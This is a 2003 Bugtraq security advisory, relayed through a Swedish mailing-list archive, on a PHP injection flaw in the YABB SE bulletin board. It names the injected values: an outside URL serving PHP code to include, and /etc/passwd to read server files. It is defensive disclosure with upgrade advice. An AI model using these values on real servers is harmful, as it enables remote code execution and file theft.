linux, säkerhet

99199 2003-04-22  17:25  /94 rader/ labs@NGSEC <labs@ngsec.com>
Importerad: 2003-04-22  17:25  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: labs@ngsec.com
Mottagare: Bugtraq (import) <4565>
Ärende: [NGSEC-2003-5] YABB SE, remote command execution
------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



                   Next Generation Security Technologies
                          http://www.ngsec.com
                            Security Advisory


       Title:   YABB SE, remote command execution.
          ID:   NGSEC-2003-5
 Application:   YABB SE up to 1.5.1
        Date:   04/22/2003
      Status:   Vendor contacted, new fixed version available.
 Platform(s):   Unix & Windows OSs.
      Author:   Fermín J. Serna <fjserna@ngsec.com>
    Location:   http://www.ngsec.com/docs/advisories/NGSEC-2003-5.txt


Overview:
- ---------

YABB SE is a popular bulletin board. It consist on the port of YABB
to MySQL/PHP. Searching at Google "YABB SE" we found about 89,400
results,  confirming its popularity.

YABB SE suffers a PHP injection vulnerability (remote command
execution)  in its language support. Any registered user can execute
commands with Web  Server privileges (normally nobody).


Technical description:
- ----------------------

Any registered user can inject PHP code in YABB SE through its
language  support. YABB SE does an include($language) where $language
is the  selected language setting retrieved form the MySQL DataBase.

In order to exploit this vulnerability, you must have a registered
user, change your language setting through the "Change Profile" tab,
using one Pen-Test Web Proxy such as HttPush, to an evil value.

This action will update your language setting in the DataBase. Next 
queries will include your evil language setting.

In order to inject PHP code, a malicious user could set the language 
variable to for example "http://zhodiac.net-dreamer.net/cmd.inc" 
where cmd.inc is the PHP code to inject.

It is also possible to use this vulnerability to access any file on
the server with Web Server privileges, only when safe_mode is
disabled,  setting the language variable for example to /etc/passwd.


Recommendations:
- ----------------
Upgrade to a newer YABB SE version (at least 1.5.2).
Run YABB SE on a secure environment.

This vulnerability could not have been exploited on a NGSecureWeb(r) 
protected Web Server.

Find more information on NGSecureWeb features at:

      http://www.ngsec.com/ngproducts/ngsw/


- -- More security advisories at:
http://www.ngsec.com/ngresearch/ngadvisories/ PGP Key:
http://www.ngsec.com/pgp/labs.asc

Copyright(c) 2002-2003 NGSEC. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+pRUEKrwoKcQl8Y4RAtIwAJ9s13PqO7+s3Sf5vQtUwWkNFRxlqwCfeO1H
UFD/u3RLCNYmUPsQKfELgt0=
=pnG4
-----END PGP SIGNATURE-----


Already mastered our Security ngGames at:

  http://quiz.ngsec.biz:8080/

Now, its time to become a NGSEC Security Expert:

  http://www.ngsec.com/ngservices/ngcert/
(99199) /labs@NGSEC <labs@ngsec.com>/-----(Ombruten)